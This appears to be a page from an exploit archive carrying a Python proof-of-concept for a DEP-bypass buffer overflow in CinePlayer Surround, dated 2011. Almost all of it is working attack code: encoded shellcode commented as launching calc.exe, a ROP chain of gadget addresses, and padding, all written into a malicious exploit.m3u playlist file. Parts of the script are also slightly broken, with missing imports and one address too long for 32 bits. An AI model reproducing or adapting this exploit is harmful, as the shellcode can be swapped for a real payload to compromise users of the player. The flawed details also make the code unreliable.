CinePlayer Surround Universal DEP Bypass Exploit



EKU-ID: 938 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-09-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
#Exploit Title: CinePlayer Surround Universal DEP Bypass Exploit
#Author: Angel Injection
#Thanks To Inj3ct0r Team
#Home: http://1337day.com , http://sec-krb.org

shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x32\xb8\x08\x99"
"\xc4\xb4\x31\x43\x17\x03\x43\x17\x83\xcb\x9d\x26\x41\x37"
"\x75\x2f\xaa\xc7\x86\x50\x22\x22\xb7\x42\x50\x27\xea\x52"
"\x12\x65\x07\x18\x76\x9d\x9c\x6c\x5f\x92\x15\xda\xb9\x9d"
"\xa6\xea\x05\x71\x64\x6c\xfa\x8b\xb9\x4e\xc3\x44\xcc\x8f"  # Shellcode WinExec "Calc.exe"
"\x04\xb8\x3f\xdd\xdd\xb7\x92\xf2\x6a\x85\x2e\xf2\xbc\x82"  # BadChars "\x0c\x0b\x0e"
"\x0f\x8c\xb9\x54\xfb\x26\xc3\x84\x54\x3c\x8b\x3c\xde\x1a"
"\x2c\x3d\x33\x79\x10\x74\x38\x4a\xe2\x87\xe8\x82\x0b\xb6"
"\xd4\x49\x32\x77\xd9\x90\x72\xbf\x02\xe7\x88\xbc\xbf\xf0"
"\x4a\xbf\x1b\x74\x4f\x67\xef\x2e\xab\x96\x3c\xa8\x38\x94"
"\x89\xbe\x67\xb8\x0c\x12\x1c\xc4\x85\x95\xf3\x4d\xdd\xb1"
"\xd7\x16\x85\xd8\x4e\xf2\x68\xe4\x91\x5a\xd4\x40\xd9\x48"
"\x01\xf2\x80\x06\xd4\x76\xbf\x6f\xd6\x88\xc0\xdf\xbf\xb9"
"\x4b\xb0\xb8\x45\x9e\xf5\x37\x0c\x83\x5f\xd0\xc9\x51\xe2"
"\xbd\xe9\x8f\x20\xb8\x69\x3a\xd8\x3f\x71\x4f\xdd\x04\x35"
"\xa3\xaf\x15\xd0\xc3\x1c\x15\xf1\xa7\xc3\x85\x99\x27")
#######################ROP START HERE#######################################
rop = pack('<L',0x5f367e8d3)
rop += pack('<L',0x013e6452)
rop += pack('<L',0x0047855b)
rop += pack('<L',0x00494277)
rop += pack('<L',0x00CA2108)
rop += pack('<L',0x10007584)
rop += pack('<L',0x00493b99)
rop += pack('<L',0x103c7de9)
rop += pack('<L',0x04e6fed7)
rop += pack('<L',0x00453cc7)
rop += pack('<L',0x100081cd)
rop += pack('<L',0x00493b98)
rop += pack('<L',0x000000db)
rop += pack('<L',0x004b0609)
rop += pack('<L',0x00000030)
rop += pack('<L',0x00645efd)
rop += ("A" * 40)
rop += pack('<L',0x00463BE9) # JMP to Shellcode
############################################################################
buf = ("\x90" * 20)
buf += shellcode
buf += ("A" * (3400-len(buf)))
buf += rop
buf += (
"\x40"
"\x7A\x30"
"\x45\xBE\x40\x15"
"\x40"
"\x8B\xEE"
"\x2B\xC8"
"\x5D\xD3"
"\x31"
"\xED\x11\x02\x31\xCD\x00"
"\xDC\x5D")
 
print "\t\t Exploit Creating"
sleep(1)
try:
    f = open("exploit.m3u","wb")
    f.write(buf)
    f.close()
    print "\t\t[+]File \"exploit.m3u\" Created Succefully."
    sleep(1)
except IOError,e:
    print "\t\t[+]Error: "+str(e)
    exit(-1)